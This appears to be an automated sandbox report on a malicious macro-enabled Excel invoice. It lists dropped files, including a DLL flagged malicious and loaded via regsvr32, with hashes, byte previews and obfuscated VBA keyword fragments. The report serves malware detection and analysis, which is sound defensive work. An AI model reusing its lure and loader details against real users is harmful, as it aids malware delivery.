                                                                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                                C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):241332
                                                                                                                                Entropy (8bit):4.206800191309377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:cGBLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cUNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                                MD5:B5792839FFCDE087027D5A547980D113
                                                                                                                                SHA1:123E5064754F793DD092351716FE63ADC710C850
                                                                                                                                SHA-256:9695E46F2FD6AA383F55D5775646FEC330F16D4F0F9A3EC5DE8DB7E5F5922DAF
                                                                                                                                SHA-512:006AFBF1F6F901CEC158587822079D3F63B91FF9610F8B085694197EA649CA4C03AE60C2B0E039BB0DC6BFF6F2BB043755FB608F76FFE2ED9048ACC0CB001BEF
                                                                                                                                Malicious:false
                                                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                                                C:\Users\user\AppData\Local\Temp\Tar8642.tmp
                                                                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                File Type:data
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):152533
                                                                                                                                Entropy (8bit):6.31602258454967
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                                                Malicious:false
                                                                                                                                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                C:\Users\user\AppData\Local\Temp\WER58FA.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3110
                                                                                                                                Entropy (8bit):3.680066132157358
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3Yq3:Wl7LBNuhhgG45nv5J
                                                                                                                                MD5:926C1C387200B707E1FCA44038B7D6A0
                                                                                                                                SHA1:D9947998A737EDA6E87F2E6B2E6F3BD8211EE50E
                                                                                                                                SHA-256:5D181418FAD2CE41571753B94787EB1713C90BE6614A0F23F0ED4591CB22AB4C
                                                                                                                                SHA-512:236B28D83651EE6761AA9E3B8E3202C978AE3A3CC0EBBCE78972CFC445E60FE62FC78FB55E9DFBDE664F0D223A030FDAD9BD0AC5F8B4502BA18E1F1FF0AF3264
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                                                                                                                                C:\Users\user\AppData\Local\Temp\cjrumqtd.dll
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):318976
                                                                                                                                Entropy (8bit):7.120104121741336
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
                                                                                                                                MD5:F317BDF94E5306AC0B02EDE9A263E36C
                                                                                                                                SHA1:073D7B5C5896A2974C454A9BC21B097C19E8AFB3
                                                                                                                                SHA-256:D5CF6F2148848F36D4A55BBC791372189EDFFB6326D8A0BB9B8743FD25BF0C8F
                                                                                                                                SHA-512:A26EDB19B9D7FDA69DB767B20A08DD769F760115CC668494B18ACED009FE1B9D4DF0D5A2D0B94F1B13D808E461A4B7C19527EA3D6C61C9B5D17DF5263E78193F
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar4A6F.xar
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):52958
                                                                                                                                Entropy (8bit):7.831640658188131
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:zYYha9orgFvRE5EG4IGWc3VsV9oyQkiY+K0/uH8n9QjU205LEd29WNJ4+TQtBv:HHgc5EGaKYI+/28nv5LkJ4+TQjv
                                                                                                                                MD5:77A248282F5733A3BFFB8AC0D18926E3
                                                                                                                                SHA1:6259E77DA9AEDFB97D12193327E950C0233315CB
                                                                                                                                SHA-256:2DDC67B6EABE13FDE5BED31948BB5DEE767F245BC712EB6AFBBB77D2464BF996
                                                                                                                                SHA-512:0C611CE78A6B90B0EDEEC688866773EA1A7398AAC6F92D9A72EF4490931D68F674CDC52B7C9ED12B244CA7D94F8C72D7DEA38FCD185E242FE90B824B343D5E47
                                                                                                                                Malicious:false
                                                                                                                                Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 03:47:45 2021, atime=Tue Jan 12 03:47:45 2021, length=16384, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):867
                                                                                                                                Entropy (8bit):4.497162942804637
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:85Q0SLgXg/XAlCPCHaX7B8NB/mBxX+Wnicvb6ObDtZ3YilMMEpxRljKicTdJP9TK:85Lk/XTr6NyxYeGCDv3qorNru/
                                                                                                                                MD5:F5D305A244F726C29F5B0AA0363008C0
                                                                                                                                SHA1:FCB62734ACE6630FA70C20CEA6E7A559093020C3
                                                                                                                                SHA-256:FB8A08911F91CBEBEC3FBB787A270C93C5262533CBB44DD803EF4DBD3E540C4B
                                                                                                                                SHA-512:75EDAF7E5DBBEAA6E5F74B8F23E8BBCF6AECBACE995E9C329C699D1E1D5A4734F6F94069961DB5CC6F649275847320DA13602A5996C48B7FE29DB167784B4A26
                                                                                                                                Malicious:false
                                                                                                                                Preview: L..................F...........7G...f.......f.......@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,R.%..Desktop.d......QK.X,R.%*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV8073565781-20210111319595.LNK
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:10 2020, mtime=Tue Jan 12 03:47:45 2021, atime=Tue Jan 12 03:47:54 2021, length=58711, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2218
                                                                                                                                Entropy (8bit):4.510813852899258
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:8KFk/XTr6NGJbGvRGeG0o7cDv3qodM7dD2KFk/XTr6NGJbGvRGeG0o7cDv3qodMj:8j/XT+NGJGk/PoQh2j/XT+NGJGk/PoQ/
                                                                                                                                MD5:5DA2F89305C33EC4BF45936B360AD48A
                                                                                                                                SHA1:D24D4AA18A2EF2C0D167AA5C81DD9D1369A86FAC
                                                                                                                                SHA-256:D13EC064B739A61E4BEDE305229FB70AB7882D897FFCB91C676521A6D0534E7A
                                                                                                                                SHA-512:DEF66068FFA93A35E1A8D5B1AE2A95AA6BA362219BC1496C787C9F9DC9B82A2C06BCFAB4CAB648D786EE40C8B2DFEB250826E88405A39F510C612C68E6CB7B1F
                                                                                                                                Malicious:false
                                                                                                                                Preview: L..................F.... ... .]..{...f..............W............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....,R.% .INV807~1.XLS..p.......Q.y.Q.y*...8.....................I.N.V.8.0.7.3.5.6.5.7.8.1.-.2.0.2.1.0.1.1.1.3.1.9.5.9.5...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\INV8073565781-20210111319595.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.8.0.7.3.5.6.5.7.8.1.-.2.0.2.1.0.1.1.1.3.1.9.5.9.5...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):139
                                                                                                                                Entropy (8bit):4.527730544910855
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:oyBVomxWnnXSTv9UVGWUhr6YC0XSTv9UVGWUhr6YCmxWnnXSTv9UVGWUhr6YCv:djUnCXZoXZ6nCXZs
                                                                                                                                MD5:C19D952CED43635AFEA47BC110F72B70
                                                                                                                                SHA1:D17FF716911242D061F98EBDAE85585A14ADF8C2
                                                                                                                                SHA-256:3FA3B693E9BE6399C48BC71B3662A4F08DC649C73A9CFB09CBC360B185A747FB
                                                                                                                                SHA-512:5D28D2D1562B0A783AB62922B581F3967E1081A84211FF63B11B45BFD7C7FEDD8363DA2C30666D3712402DA2028D6C3740F9A9B4334609E080D666BF1798221F
                                                                                                                                Malicious:false
                                                                                                                                Preview: Desktop.LNK=0..[misc]..INV8073565781-20210111319595.LNK=0..INV8073565781-20210111319595.LNK=0..[misc]..INV8073565781-20210111319595.LNK=0..
                                                                                                                                C:\Users\user\Desktop\3DEE0000
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):58711
                                                                                                                                Entropy (8bit):7.859300767664731
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:hq8RzggbLmCf6646CIKSqtkTT61OVRYA8NZsLNFqo+Vt:hD1rmCM2VAOVRYL+9Q
                                                                                                                                MD5:3E7D81D1E78B3140F1149F1E2CAA7617
                                                                                                                                SHA1:9B7F1DE5831BE9B477FFF8256DB9E759A5C38EB0
                                                                                                                                SHA-256:7AA7EE516B89FDD183ED2E0A6B41630546121AC7C8C97F4B8A78BDD943BEAD7A
                                                                                                                                SHA-512:ABC41A47BA1B702C0F59CEAB3556BC7CD20ED8676DB441842ABB5CB9D7B66E00E491EC39D0AC000B841B5D6F05DDA15EC2F66A60758F4837A03068CE4DB45A12
                                                                                                                                Malicious:false
                                                                                                                                Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\Desktop\~$INV8073565781-20210111319595.xlsm
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):330
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                Malicious:true
                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                Entropy (8bit):7.77272893585129
                                                                                                                                TrID:
                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                File name:INV8073565781-20210111319595.xlsm
                                                                                                                                File size:42039
                                                                                                                                MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
                                                                                                                                SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
                                                                                                                                SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
                                                                                                                                SHA512:4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
                                                                                                                                SSDEEP:768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
                                                                                                                                File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                Static OLE Info

                                                                                                                                General

                                                                                                                                Document Type:OpenXML
                                                                                                                                Number of OLE Files:2

                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/338240/sample/INV8073565781-20210111319595.xlsm"

                                                                                                                                Indicators

                                                                                                                                Has Summary Info:False
                                                                                                                                Application Name:unknown
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:
                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                Contains Visio Document Stream:
                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                Flash Objects Count:
                                                                                                                                Contains VBA Macros:True

                                                                                                                                Summary

                                                                                                                                Author:
                                                                                                                                Last Saved By:
                                                                                                                                Create Time:2020-12-07T14:38:21Z
                                                                                                                                Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                Security:0

                                                                                                                                Document Summary

                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                Company:
                                                                                                                                Contains Dirty Links:false
                                                                                                                                Shared Document:false
                                                                                                                                Changed Hyperlinks:false
                                                                                                                                Application Version:16.0300

                                                                                                                                Streams with VBA

                                                                                                                                VBA File Name: Module1.bas, Stream Size: 3215
                                                                                                                                General
                                                                                                                                Stream Path:VBA/Module1
                                                                                                                                VBA File Name:Module1.bas
                                                                                                                                Stream Size:3215
                                                                                                                                Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                Integer:
                                                                                                                                bycilke()
                                                                                                                                VB_Name
                                                                                                                                MiV(sem.value)
                                                                                                                                homepodd()
                                                                                                                                homepodd
                                                                                                                                Error
                                                                                                                                Integer)
                                                                                                                                bycilke
                                                                                                                                Function
                                                                                                                                ol).Name
                                                                                                                                "!"):
                                                                                                                                String
                                                                                                                                "ab":
                                                                                                                                Split(govs,
                                                                                                                                Randomize:
                                                                                                                                yellowsto(yel
                                                                                                                                Next:
                                                                                                                                ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                                                                                yellowsto(Oa))))
                                                                                                                                Integer
                                                                                                                                yellowsto
                                                                                                                                ol).value
                                                                                                                                nimo(Int((UBound(nimo)
                                                                                                                                Replace(Vo,
                                                                                                                                Chr(sem.Row)
                                                                                                                                Sheets(ol).Cells(homepodd,
                                                                                                                                "ab"))
                                                                                                                                Split(kij(ol),
                                                                                                                                yellowsto(homepodd))
                                                                                                                                Rnd))
                                                                                                                                (Run(""
                                                                                                                                "moreP_"
                                                                                                                                Variant)
                                                                                                                                Attribute
                                                                                                                                Resume
                                                                                                                                pagesREviewsd(Optional
                                                                                                                                ecimovert(nimo
                                                                                                                                ecimovert
                                                                                                                                MsgBox
                                                                                                                                VBA Code
                                                                                                                                VBA File Name: Sheet1.cls, Stream Size: 1639
                                                                                                                                General
                                                                                                                                Stream Path:VBA/Sheet1
                                                                                                                                VBA File Name:Sheet1.cls
                                                                                                                                Stream Size:1639
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                                                                                                                                Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                Index
                                                                                                                                VB_Name
                                                                                                                                VB_Creatable
                                                                                                                                Application.OnTime
                                                                                                                                VB_Exposed
                                                                                                                                Long)
                                                                                                                                ResizePagess()
                                                                                                                                VB_Customizable
                                                                                                                                "REviewsd"
                                                                                                                                VB_Control
                                                                                                                                MultiPage"
                                                                                                                                VB_TemplateDerived
                                                                                                                                MSForms,
                                                                                                                                False
                                                                                                                                Attribute
                                                                                                                                Private
                                                                                                                                VB_PredeclaredId
                                                                                                                                VB_GlobalNameSpace
                                                                                                                                VB_Base
                                                                                                                                ResizePagess
                                                                                                                                "pages"
                                                                                                                                VBA Code
                                                                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                                                General
                                                                                                                                Stream Path:VBA/ThisWorkbook
                                                                                                                                VBA File Name:ThisWorkbook.cls
                                                                                                                                Stream Size:999
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                False
                                                                                                                                VB_Exposed
                                                                                                                                Attribute
                                                                                                                                VB_Name
                                                                                                                                VB_Creatable
                                                                                                                                "ThisWorkbook"
                                                                                                                                VB_PredeclaredId
                                                                                                                                VB_GlobalNameSpace
                                                                                                                                VB_Base
                                                                                                                                VB_Customizable
                                                                                                                                VB_TemplateDerived
                                                                                                                                VBA Code

                                                                                                                                Streams

                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                                                                                General
                                                                                                                                Stream Path:PROJECT
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Stream Size:550
                                                                                                                                Entropy:5.28107922141
                                                                                                                                Base64 Encoded:True
